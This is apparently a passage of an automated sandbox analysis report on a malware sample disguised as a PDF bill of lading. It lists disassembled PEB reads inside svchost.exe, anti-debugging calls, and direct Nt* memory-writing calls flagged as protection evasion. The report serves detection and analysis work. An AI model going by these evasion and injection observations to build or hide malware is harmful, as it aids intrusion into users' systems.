            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]1_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]1_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]1_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]1_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]1_2_03C72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]1_2_03C4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]1_2_03C66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]1_2_03C68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]1_2_03C3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]1_2_03C365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]1_2_03C325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]1_2_03C64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]1_2_03C6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]1_2_03CC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E53E mov eax, dword ptr fs:[00000030h]1_2_03C5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C304E5 mov ecx, dword ptr fs:[00000030h]1_2_03C304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA49A mov eax, dword ptr fs:[00000030h]1_2_03CEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364AB mov eax, dword ptr fs:[00000030h]1_2_03C364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644B0 mov ecx, dword ptr fs:[00000030h]1_2_03C644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]1_2_03CBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E443 mov eax, dword ptr fs:[00000030h]1_2_03C6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA456 mov eax, dword ptr fs:[00000030h]1_2_03CEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2645D mov eax, dword ptr fs:[00000030h]1_2_03C2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5245A mov eax, dword ptr fs:[00000030h]1_2_03C5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC460 mov ecx, dword ptr fs:[00000030h]1_2_03CBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A470 mov eax, dword ptr fs:[00000030h]1_2_03C5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68402 mov eax, dword ptr fs:[00000030h]1_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]1_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB6420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C50BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C30BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C38BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CE4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D02B57 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C28B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C2CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D04B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CF8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C86ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C30AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C64AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D04A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C68A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C38AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C86AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C36A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C40A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CDEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C54A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D04940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C7096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CB892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CC892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03D008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C42840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C60854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03C34859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03CBE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_0042202E SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe NtOpenSection: Direct from: 0x76F02E0C
